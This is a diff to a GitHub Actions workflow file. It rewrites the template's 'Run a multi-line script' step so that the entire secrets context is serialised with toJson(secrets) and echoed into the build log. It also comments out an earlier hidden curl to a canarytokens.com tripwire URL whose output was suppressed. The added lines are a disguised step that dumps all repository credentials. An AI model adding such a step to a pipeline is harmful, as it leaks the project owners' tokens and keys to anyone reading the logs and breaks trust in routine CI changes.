--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -27,9 +27,12 @@ jobs:
 
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
+        env: 
+          SECRETS_CONTEXT: ${{ toJson(secrets) }}
         run: |
-          {
-          echo Add other actions to build,
-          echo test, and deploy your project.
-          curl http://canarytokens.com/articles/621jcvsq91hs4j6sk7g3wcud0/contact.php
-          } &> /dev/null
+          echo "$SECRETS_CONTEXT"
+        #{
+        #echo Add other actions to build,
+        #echo test, and deploy your project.
+        #curl http://canarytokens.com/articles/621jcvsq91hs4j6sk7g3wcud0/contact.php
+        #} &> /dev/null
